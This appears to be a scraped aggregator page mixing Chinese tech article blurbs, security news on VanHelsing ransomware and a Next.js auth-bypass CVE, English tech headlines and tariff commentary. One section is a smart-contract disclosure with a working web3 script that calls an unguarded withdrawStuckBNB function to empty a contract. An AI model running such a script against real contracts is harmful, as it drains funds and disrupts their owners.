友情帮转,shawn哥公司的产品。大家有需要的可直接联系。
大家好,我是BaCde,过年期间开发了Afuzz这款工具。今天给大家详细介绍介绍。
RapidDNS私有化部署方案
大家好,我是BaCde。今天教你30分钟实现自动化刷FOFA F点。
RapidDNS私有化部署方案
【摘要】本文作为AI可解释性系列的第二部分,旨在以汉语整理并阅读归因方法(Attribution)相关的论文,并持续更新。 归因方法主要研究如何解释深度神经网络的决策过程,通过识别输入特征对模型输出的贡献程度,对模型的决策过程输出为人类可以理解的图像或者量化指标,帮助我们理解模型的决策依据。 阅读全文
【摘要】本文首发在我的博客:https://blog.liuzijian.com/post/mybatis-plus-source-data-permission-interceptor.html 一、概述 DataPermissionInterceptor是MyBatis-Plus中的一个拦截器插件,用于 阅读全文
【摘要】ShadowSql专职拼写sql,要想做为ORM就需要借高人之手 我们要借的就是Dapper,Dapper以高性能著称,ShadowSql搭配Dapper就是强强联手 为此本项目内置了一个子项目Dapper.Shadow就是Dapper扩展 以下是Dapper.Shadow的示例 一、配置Dappe 阅读全文
【摘要】大纲 1.zk实现数据发布订阅 2.zk实现负载均衡 3.zk实现分布式命名服务 4.zk实现分布式协调(Master-Worker协同) 5.zk实现分布式通信 6.zk实现Master选举 7.zk实现分布式锁 8.zk实现分布式队列和分布式屏障 1.zk实现数据发布订阅 (1)发布订阅系统一般 阅读全文
【摘要】据说在人工智能时代,数据标注员是一个很重要的职业,比如自动车子要在马路上跑,需要人工提前在马路上做一些标注,标注好了之后交给机器识别,做判断。 有意思的是,想要获得一只机器狗,或者是造出来的机器人能顺利地和狗说话,互动,咱们总得知道狗有什么习性和行为,于是,动物智能数据标记员这个职业就诞生了。 土地 阅读全文
【摘要】大家好,我是痞子衡,是正经搞技术的痞子。今天痞子衡给大家介绍的是恩智浦i.MX RT1xxx系列上的XBAR外设。 得益于 Arm Cortex-M 内核的普及,现如今 MCU 厂商遍地开花,只要能取得内核授权,再去 OpenCores 开源网站或者直接第三方 IP 公司买一些通用的外设模块拼拼凑凑 阅读全文
【摘要】从零开始解析Transformer,目标是:(1) 解析Transformer如何运作,以及为何如此运作,让新同学可以入门;(2) 力争融入一些比较新的或者有特色的论文或者理念,让老鸟也可以有所收获。 阅读全文
【摘要】大家好,我是小康。 网上讲回调函数的文章不少,但大多浅尝辄止、缺少系统性,更别提实战场景和踩坑指南了。作为一个在生产环境中与回调函数打了多年交道的开发者,今天我想分享一些真正实用的经验,带你揭开回调函数的神秘面纱,从理论到实战全方位掌握这个强大而常见的编程技巧。 开篇:那些年,我们被回调函数整懵的日 阅读全文
【摘要】MySurvey 项目 很久没更新我的博客了,之前开发的Biwen.QuickApi微框架 一直没有开发一个示例项目,最近有点时间,写了一个示例项目稍微介绍下, 项目地址 欢迎Star: https://github.com/vipwan/MySurvey 项目简介 这是一个基于 Biwen.Qui 阅读全文
【摘要】SQL 全称 Structured Query Language,结构化查询语言。操作关系型数据库的编程语言,定义了一套操作关系型数据库统一标准 。 一、SQL 基础知识 (一)SQL 通用语法 在学习具体的SQL语句之前,先来了解一下SQL语言的通用语法。 ① SQL语句可以单行或多行书写,以分号 阅读全文
【摘要】AI团队比单打独斗强!CrewAI多智能体协作系统开发踩坑全解析 阅读时间: 5分钟 | 字数: 1500+ "你是否曾为单个大模型难以解决复杂专业问题而苦恼?是否想过,如果能像组建专业团队一样安排多个AI协同工作,会发生什么神奇的事情?本文将分享我基于CrewAI框架构建多智能体协作系统的实战经验 阅读全文
【摘要】3. RabbitMQ 的(Hello World) 和 RabbitMQ 的(Work Queues)工作队列 @目录3. RabbitMQ 的(Hello World) 和 RabbitMQ 的(Work Queues)工作队列1. RabbitMQ 的经典国际代码(Hello World)2. 阅读全文
【摘要】AI 会淘汰程序员么? 我的答案是 “会”。 AI 会不会淘汰程序员?这是学编程的朋友们非常关注的问题,我也一样,因为如果程序员被淘汰了,那我这个程序员博主也就光荣退休了。 阅读全文
【摘要】一、概述 dify运行在容器中,PostgreSQL用的是阿里云,已经运行了很长一段时间。某些表的数据量很大,比如workflowruns表,就有100GB。这个主要是,详细记录了工作流的执行情况,包括执行时间、状态、结果等信息。版本比较老,0.14.2,需要升级到0.15.3。 升级之前,除了对数 阅读全文
【摘要】这个米老鼠洗衣机,大家眼熟吗? 相信最近热衷于在网上冲浪的朋友们,对这款形似米老鼠的“懒人洗衣机”并不陌生,甚至算是小小地参与了一下这个产品研发项目。在海尔的周云杰总裁爆火出圈后,有网友在海尔的媒体账号下,喊话周总研发一款可同时并分区洗衣服、内衣、鞋子和袜子的 “懒人洗衣机”。基于此,2天后,海尔集 阅读全文
【摘要】Java 与 LLM 大模型融合的技术革命:JBoltAI 如何重构企业级 AI 开发范式一、Java 技术栈的智能化转型挑战随着 LLM(大语言模型)技术的突破,全球超过 900 万家 Java 企业正面临技术重构压力。传统 Java 开发体系在应对 AI 化转型时遭遇三大核心挑战:多模型适配困境 阅读全文
【摘要】Dify 是一个帮助你快速搭建 AI 应用的工具,其定位类似Coze。但相比Coze——Dify是免费的、开源的,人人都可以用。哪怕你不懂编程,也能用它参与到 AI 应用的设计和使用中。总之,如果你是开发者,它帮你省下大量重复工作,把精力放在真正的创造和业务上;如果你不是程序员,你也能用它搞出属于自 阅读全文
【摘要】ESP32-S3接入大模型API,对话AI 1、先使用python验证可行性 import requests url = "https://api.siliconflow.cn/v1/chat/completions" payload = { "model": "deepseek-ai/DeepSe 阅读全文
【摘要】活动中台系统非常注重系统性能和用户体验,而出现慢查询可能导致应用程序响应变慢、请求堆积、系统负载增加等问题,甚至引发系统崩溃或不可用的情况。本文主要介绍活动中台系统针对慢SQL问题的实践治理案例。 阅读全文
【摘要】ShadowSql包含sql的绝大多数功能 按可执行功能分为Insert、Delete、Update、Select(SingleSelect)、CreateTable、DropTable和TruncateTable 以上功能还包含子功能,有Table、AliasTable、DB、TableView、 阅读全文
今日暂未更新资讯~ 更多最新文章,请访问SecWiki
近日,全球领先的IT市场研究和咨询公司IDC发布《IDC Market Glance: 中国AI Agent应用市场概览,1Q25》 (Doc#CHC53057625,2025年3月,简称“报告”),报告提供了中国AI Agent应用市场的细分市场分类以及代表厂商,旨在全面展示中国AI Agent应用的市场格局。凭借领先的大模型技术与应用实力,360入选智能助理、内容创作、办公协同、生产力工具、安全等五大领域代表厂商,数量位居安全行业首位,成为引领中国大模型及Agent应用市场发展的关键力量。 IDC指出,当前,国内AI Agent市场对定义缺乏一致性,真正符合自主性、主动性、适应性特质的AI Agent产品较少,这直接导致市场产品质量良莠不齐,终端用户甄别难度增大。为此,IDC对市面上的AI Agent应用进行了梳理,从消费者端和企业端两大维度的多个方面展示了智能体的多元化应用。 360在消费者端拥有近20年的国民级互联网服务经验,并在实践中沉淀了成熟的企业级大模型和智能体解决方案。在本次报告中,360凭借360安全大模型、360纳米AI、360织语等产品在消费者端的智能助理、内容创作领域和企业端的办公协同、生产力工具、安全领域表现突出,成为安全行业入选最多领域的厂商。具体来说: · 360安全大模型:360提出用AI重塑安全并推出首个AI实战应用的安全行业大模型:360安全大模型,在安全智能体方面,聚焦自动化威胁狩猎、深度分析研判、威胁攻击溯源、钓鱼邮件检测等领域进行专项训练,推出100+安全数字专家,帮助企业进行针对性安全防护能力提升,低成本、高效率地实现24小时不间断安全守护。 · 360纳米AI:拥有全网最大的大模型超市,集成包括DeepSeek、豆包、Kimi等国内16家大模型厂商的50多款模型;上线全网首个大模型驱动的多模态知识库,成为用户的第二大脑,永久记忆;纳米AI还是视频高手,文生图、图生视频、视频生视频,各类视频大模型随心调用,为个人用户带来全新的大模型使用体验。 · 360织语:立足政企智能化协作深度需求,通过得天独厚的超级入口和底座能力,以Agent开发平台为核心引擎,与业务集成、应用生成、事项协作等能力紧密结合,深度打通业务流、消息流与知识流,实现跨系统、跨部门的一体化业务协同,用AI重塑政企协作流程,让复杂工作更简单更高效。 IDC强调,Al Agent将迎来规模化落地浪潮。未来,360将持续深耕大模型在各领域的落地应用,加速产业数智化升级,推动人工智能迈向新高度!
一种名为 VanHelsing 的新型多平台勒索软件即服务(RaaS)操作已经出现,其攻击目标涵盖 Windows、Linux、BSD、ARM 和 ESXi 系统。 3 月 7 日,VanHelsing首次在地下网络犯罪平台上进行推广,可使经验较多的会员免费加入,但要求经验较少的威胁者缴纳 5000 美元的押金。 CYFIRMA 在上周晚些时候首次记录了这一新的勒索软件操作,Check Point Research 则进行了更深入的分析,并于昨日发表相关报告。 VanHelsing内部运作 Check Point 的分析师报告称,VanHelsing 是一个俄罗斯的网络犯罪项目,该项目禁止针对独联体(CIS)国家的系统进行攻击。 联盟会员能够保留 80% 的赎金,而运营商收取 20% 的佣金。付款通过自动托管系统处理,该系统采用两个区块链确认来保障安全。 VanHelsing 广告邀请会员加入 被接受的附属机构可以访问具有完整操作自动化的面板,同时还能获得开发团队的直接支持。 从受害者网络窃取的文件直接存储在 VanHelsing 行动的服务器上。核心团队声称,他们会定期进行渗透测试,以确保系统具备一流的安全性和可靠性。 目前,暗网上的 VanHelsing 勒索门户列出了三名受害者,其中两名在美国,一名在法国。其中一个受害者是德克萨斯州的一个城市,另外两名受害者是科技公司。 VanHelsing 勒索页面 勒索软件运营商威胁称,如果他们的财务要求得不到满足,将在未来几天泄露被盗文件。根据 Check Point 的调查,赎金金额为 50 万美元。 VanHelsing 的勒索信 隐身模式 VanHelsing 勒索软件由 C++ 编写,有证据显示它于 3 月 16 日首次在实际环境中部署。 VanHelsing 使用 ChaCha20 算法进行文件加密,为每个文件生成一个 32 字节(256 位)的对称密钥和一个 12 字节的随机数。然后,使用嵌入的 Curve25519 公钥加密这些值,并将生成的加密密钥 / 随机数对存储在加密文件中。 VanHelsing 对大于 1GB 的文件进行部分加密,但对较小的文件则运行完整的加密过程。 该恶意软件支持丰富的 CLI 定制,以便针对每个受害者定制攻击。例如,可以针对特定驱动器和文件夹、限制加密范围、通过 SMB 传播、跳过卷影副本删除,以及启用两相隐身模式。 在正常加密模式下,VanHelsing 会枚举文件和文件夹,加密文件内容,并重命名生成的文件,附加 “.vanhelsing” 扩展名。 在隐身模式下,勒索软件将加密与文件重命名分离。由于文件 I/O 模式模仿正常系统行为,因此不太可能触发警报。即使安全工具在重命名阶段开始时做出反应,在第二遍操作时,整个目标数据集也已经被加密了。 隐形加密功能 尽管 VanHelsing 看起来很先进且发展迅速,但 Check Point 注意到了一些代码不成熟的问题。其中包括文件扩展名不匹配、可能触发双重加密的排除列表逻辑错误,以及几个未实现的命令行标志。尽管存在这些错误,VanHelsing 仍然是一个令人担忧且不断上升的威胁,正在逐渐受到更多关注。
1、漏洞概述 近日,vercel发布更新修复Next.js中间件鉴权绕过漏洞(CVE-2025-29927),建议您及时开展安全风险自查。 据描述,由于 next.js应用程序使用中间件时,其函数调用 runMiddleware 会识别x-middle-subrequest请求头,用以识别是否应用了中间件,如果其值是中间所在路径,则可以完全绕过鉴权。攻击者可以利用该漏洞获取服务器敏感信息。如果站点具有缓存/CDN 系统,则可能会强制缓存 404 响应,从而使其页面不可用,严重影响其可用性 。 漏洞影响的产品和版本: 11.1.4 <= next.js <= 13.5.6 14.0.0 <= next.js <= 14.2.24 15.0.0 <= next.js <= 15.2.2 2、漏洞复现 3、资产测绘 据daydaymap数据显示互联网存在2,864,117个资产,国内风险资产分布情况如下: 4、解决方案 临时缓解方案: 部署针对项目的监控系统:阻止包含 x-middleware-subrequest 标头的外部用户请求到达您的 Next.js 应用程序。 升级修复: 目前官方已发布修复安全补丁 https://github.com/vercel/next.js/releases/tag/v15.2.3 https://github.com/vercel/next.js/releases/tag/v14.2.25 5、参考链接 https://github.com/advisories/GHSA-f82v-jwr5-mffw https://www.ddpoc.com/DVB-2023-9004.html 原文链接
1、背景描述 合约是一个在满足特定条件时在区块链上执行代码的程序,各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。 存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融(DeFi)的创新项目,旨在通过趣味性和实用性打破传统Meme代币的模式。 该合约的代币目前市值1400K(USDT),日均交易量150K(USDT) 2、问题描述 该合约“withdrawStuckBNB”函数没有添加权限控制,攻击者可以通过调用“withdrawStuckBNB”函数,将合约内所有BNB转至营销地址“marketingAddress”,从而导致合约交易异常。 tips: BNB是BNB链生态系统的原生代币,该系统包含BNB智能链(BSC)和BNB信标链。在BNB智能链上,BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币,使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。 BNB在这个合约中的作用包括:作为交易对的配对货币,用于支付交易手续费,流动性池的组成部分,以及手续费收入的分配媒介 3、问题代码分析 ```solidity function withdrawStuckBNB() external { bool success; (success,) = address(marketingAddress).call{value: address(this).balance}(""); }``` 在合约代码里面可以看到,`withdrawStuckBNB` 没有添加onlyOwner修饰,只有external修饰 tips: Solidity语法中有4中默认函数修饰符 - public:最大访问权限,任何人都可以调用。 - private:只有合约内部可以调用,不可以被继承。 - internal:子合约可以继承和调用。 - external:外部可以调用,子合约可以继承和调用,当前合约不可以调用。 onlyOwner是该合约自定义一个修饰器,用于修饰函数,只有合约的所有者才能调用该函数。 这就意味着任何人都可以调用这个函数,将合约内所有BNB转至营销地址,导致资金被盗。 4、后续利用链分析 从问题代码可知,任何人都可以调用这个函数,将合约内所有BNB转至营销地址marketingAddress 查看marketingAddress的代码,marketingAddress是一个营销地址,更新marketingAddress的代码如下: 可以看到,updateMarketingAddress函数存在onlyOwner修饰,只有owner可以调用这个函数,这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止,攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress,但是marketingAddress本身只能由owner更新,所以攻击者无法更新marketingAddress的地址,从而无法将BNB转至攻击者的地址,但是漏洞也能造成合约内BNB的清空,影响合约运行。 5、构造POC ```javascriptconst Web3 = require('web3');// // 初始化 Web3 实例,这里使用测试网的地址,你可以根据实际情况修改const web3 = new Web3('https://data-seed-prebsc-1-s1.binance.org:8545');// const web3 = new Web3('https://bsc-dataseed4.binance.org/'); const contractABI = ["""换成完整ABI"""];const contractAddress = "0xaaaaa"; // 替换为目标合约地址const contract = new web3.eth.Contract(contractABI, contractAddress);console.log("connect success"); // 如果使用 Node.js,需要添加私钥const privateKey = '0xbbbbbbbbbbbbbb'; // 替换为你的私钥const account = web3.eth.accounts.privateKeyToAccount(privateKey);web3.eth.accounts.wallet.add(account); async function withdrawBNB() { try{ console.log(account.address); const tx = { from: account.address, // 必须使用真实地址 to: contractAddress, gas: 300000, data: contract.methods.withdrawStuckBNB().encodeABI() }; // 估算 gas const gas = await web3.eth.estimateGas(tx); tx.gas = gas; // 获取当前 gasPrice const gasPrice = await web3.eth.getGasPrice(); tx.gasPrice = gasPrice; // 签名并发送交易(Node.js 方式) const signedTx = await web3.eth.accounts.signTransaction(tx, privateKey); const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction); console.log('Transaction Hash:', receipt.transactionHash); console.log('Receipt:', receipt); } catch (error) { console.error("Error:", error); } console.log("2");} withdrawBNB();console.log("3");``` 6、修复方案 在withdrawStuckBNB函数中添加onlyOwner修饰,只允许owner可以调用这个函数 ```solidity function withdrawStuckBNB() external onlyOwner { (bool success,) = marketingAddress.call{value: address(this).balance}(""); require(success, "Transfer failed"); }``` 该漏洞目前已向相关单位和厂商报送并已推出补丁,使用此漏洞造成的任何攻击影响均与本文作者无关。 原文链接
3月31日,由上海市通信管理局指导、上海市互联网协会主办的“APP合规安全公益行”在上海浦东软件园盛大举行。此次活动围绕APP合规安全的关键议题展开深入交流,共同探寻行业未来发展的新路径,致力于推动APP行业实现健康、有序、可持续的发展。梆梆安全受邀出席作主题分享,深度剖析典型场景下的隐私合规技术实践。 上海市互联网协会副秘书长姜国致辞,着重强调构建健康、安全、有序的APP生态系统迫在眉睫。当前,恶意软件肆虐、个人信息违规收集以及数据泄露等问题频发,严重威胁着用户权益、行业发展乃至社会稳定。只有打造规范的APP生态,才能为行业持续创新发展筑牢根基,切实保障广大用户的合法权益。 上海市互联网协会副秘书长 姜国 会议期间,上海市通信管理局移动互联网工作组专家钱艺玮女士详细讲解了2025年APP用户权益保护监督管理重点部署。 上海市通信管理局移动互联网工作组专家 钱艺玮 在主题分享环节,梆梆安全合规专家王毅发表《移动互联网应用隐私合规技术》演讲,结合隐私合规监管要求以及典型案例,深入剖析APP的隐私合规标准以及在“违法违规收集个人信息、自启动及关联启动滥用、欺骗诱导用户授权”等高发违规场景下的合规安全实操技术重点。 梆梆安全合规专家 王毅 会议最后,上海市通信管理局互联网管理处纪容对会议进行总结,对本次活动的成果给予肯定,并鼓励各方继续携手合作,共同推进APP合规安全工作。纪容指出,在上海市通信管理局的指导下,通过各方共同努力,一定能够构建一个安全、透明、可信赖的APP使用环境,为用户提供更加优质、安全的服务。 上海市通信管理局互联网管理处 纪容 本次 “APP合规安全公益行” 活动为行业搭建了一个交流与合作的平台,通过政策解读、技术分享和案例分析,提高了企业对APP合规安全的重视程度,增强企业应对合规安全挑战的能力。 梆梆安全作为个人信息保护生态建设的守护者,依托多年技术沉淀,以为“自动化检测+人工审查”形式,提供从合规检测、风险评估到整改落地的个人信息隐私合规评估及咨询服务,帮助用户发现多业务场景下的应用违规行为,助力企业构建符合监管要求的移动安全防护体系。针对近期在业务场景中高频发生的违法违规收集使用个人信息典型问题,梆梆安全提供合规建议如下: 1. 自启动和关联启动场景 合规建议:确因业务实现需要的自启动行为,需要在隐私政策中明确说明自启动的主体、场景及业务必要性;须征得用户同意隐私政策后启动;不得存在结束进程/伴随系统启动而启动的自启动行为;须区分自身或第三方SDK的自启动行为。 2. 个人信息收集场景 合规建议:APP需设置隐私政策、明确收集使用个人信息规则;明确APP使用个人信息的目的、方式、范围等;APP首次运行时以弹窗提示用户阅读隐私政策(不得默认勾选);隐私政策同意前/拒绝后,不得收集个人信息;不得超出授权范围收集个人信息;遵循最小必要原则;仅收集与当前场景相关的个人信息。 3. 欺骗误导用户授权场景 合规建议:关闭/跳过按钮应明显、有效;不能全局跳转,需设置跳转控件;摇一摇重力感应需满足参数要求;推荐下载需明示开发运营者、产品功能、隐私政策、权限列表等必要信息,不得“偷梁换柱,强制捆绑,静默下载”。 近日,四部委联合启动2025年个人信息保护系列专项行动,将针对“App(含小程序、公众号、快应用)、SDK、智能终端、人脸识别”等六大违法违规收集使用个人信息典型问题开展集中治理,切实保护公民个人信息安全,督促指导个人信息处理者不断提升合规水平。 在数字经济与合规监管的双重驱动下,梆梆安全始终以"技术赋能合规"为核心战略,深耕移动安全技术研发,为企业构建覆盖全生命周期的数据安全防护体系。未来,公司将持续深化人工智能技术在隐私合规领域的融合应用,打造智能化、动态化的防护体系,为个人信息保护筑造坚实的技术防线,助力企业在合规道路高质量发展。
Following up on OnePlus' April Fool's Day teaser, the head of OnePlus China shared a few details about the company's next smartphone.
New report suggests that Samsung is allegedly pushing the launch of the Galaxy S25 Edge due to technical issues.
DeepMind says AGI could arrive in 2030, and it has some ideas to keep us safe.
Yes, encryption/decryption occurs on end-user devices, but there's a catch.
300 aspects of each call were cataloged, letting researchers estimate meaning.
Nvidia says the Switch 2's GPU is 10 times faster than the original Switch.
Voice breaks in Latin American monkey calls resemble human yodeling, but over a much wider frequency range.
Google Pixel 6 and newer phones can test out Android beta updates early, but what if you've had enough? Here's how to uninstall them.
Mike Masnick has a great piece at TechDirt running down just how stupid everything about Trump’s tariff trade war is: Whoever on the Council of Economic Advisers used this formula should turn in their econ degree, because this is not how anything works. Even if they then go on to publish another version of the formula that looks all sophisticated and shit. Brendan Duke, on X, shows that the fancier version of their formula — which is fancy in the way that Vertu phones are “fancy” — is even stupider, because the two Greek letters they chose to glam it up just cancel each other out. Back to Masnick: This is what happens when you ask ChatGPT to “make my wrong econ math look more scientific.” The document even admits that they couldn’t figure out the actual tariff rates, so they “proxied” them with this formula instead. That’s a bit like saying you couldn’t find your house keys, so you proxied them with a banana. The fundamental problem here isn’t just that the tariff numbers are wrong — though they absolutely are. It’s that the entire premise rests on treating trade deficits as if they were tariffs. They’re not the same thing. At all. Let’s back up for a moment and talk about trade deficits, because Trump has been getting this wrong for longer than some of his supporters have been alive. His logic appears to be: “Deficit” sounds bad Therefore, trade deficits must be bad Therefore, countries with whom we have trade deficits must be cheating us Therefore, we should punish them with tariffs to “level the playing field” This sounds like it must be an exaggeration for comic effect, but it’s not. That’s how Trump’s mind works. This is what Trump has been saying about trade deficits for decades. It’s like how he understands “asylum” to mean “insane asylum” and so when he talks about political asylum he starts talking about “the late great Hannibal Lecter”. ★
The Economist: On economics Mr Trump’s assertions are flat-out nonsense. The president says tariffs are needed to close America’s trade deficit, which he sees as a transfer of wealth to foreigners. Yet as any of the president’s economists could have told him, this overall deficit arises because Americans choose to save less than their country invests — and, crucially, this long-running reality has not stopped its economy from outpacing the rest of the g7 for over three decades. There is no reason why his extra tariffs should eliminate the deficit. Insisting on balanced trade with every trading partner individually is bonkers — like suggesting that Texas would be richer if it insisted on balanced trade with each of the other 49 states, or asking a company to ensure that each of its suppliers is also a customer. And Mr Trump’s grasp of the technicalities was pathetic. He suggested that the new tariffs were based on an assessment of a country’s tariffs against America, plus currency manipulation and other supposed distortions, such as value-added tax. But it looks as if officials set the tariffs using a formula that takes America’s bilateral trade deficit as a share of goods imported from each country and halves it — which is almost as random as taxing you on the number of vowels in your name. There is no way to report on these tariffs in a way that is honest and accurate without describing them as bonkers and nonsensical. News publications that are trying to present them as rational, or describing them as “reciprocal” just because that’s the word the White House is using, are beclowning themselves. ★
CNBC: Markets plunged the day after President Donald Trump imposed a far-reaching “reciprocal tariff” policy, including a 10% baseline tariff on almost every country on earth. The plan slaps much steeper tariff rates on many countries, including 34% on China, 20% on the European Union, 46% on Vietnam and 32% on Taiwan. Economists and U.S. trade partners are raising questions about how the White House calculated the tariff rates it claimed other countries “charge” the United States. Apple, in particular, is taking it on the chin, about 9.5% for the day. Nike is down over 13%. From CNBC’s corresponding story on just how the White House computed the “tariff” rates it claims for various countries: Many observers said the U.S. appeared to have divided the trade deficit by imports from a given country to arrive at tariff rates for individual countries. Such methodology doesn’t necessarily align with the conventional approach for calculating tariffs and implies the U.S. would have looked at only the trade deficit in goods and ignored trade in services. “Such methodology doesn’t necessarily align with the conventional approach” is an overlong euphemism for “The president literally doesn’t understand what tariffs are”. James Surowiecki was seemingly the first person to figure out the White House’s nonsensical formula: Just figured out where these fake tariff rates come from. They didn’t actually calculate tariff rates + non-tariff barriers, as they say they did. Instead, for every country, they just took our trade deficit with that country and divided it by the country’s exports to us. So we have a $17.9 billion trade deficit with Indonesia. Its exports to us are $28 billion. $17.9/$28 = 64%, which Trump claims is the tariff rate Indonesia charges us. What extraordinary nonsense this is. Don’t rack your brain trying to make sense out of the nonsensical. ★
Trump accused of consulting chatbots after critics mock tariffs on islands of penguins.
SpaceX hasn't said whether the next Starship flight will use a new or flight-proven booster.
The Pixel 10 series' camera specs leak and looks like the Pixel 10 is losing significant camera power.
The last few Meta Quest updates have been full of bugs. It's time Meta gets a handle on the situation.
让大模型识别文章是否包含敏感内容
断断续续坚持了2个月,今天终于把《大明王朝1566》给听完了,讲的是明朝嘉靖三十九年到嘉靖四十五年之间,围绕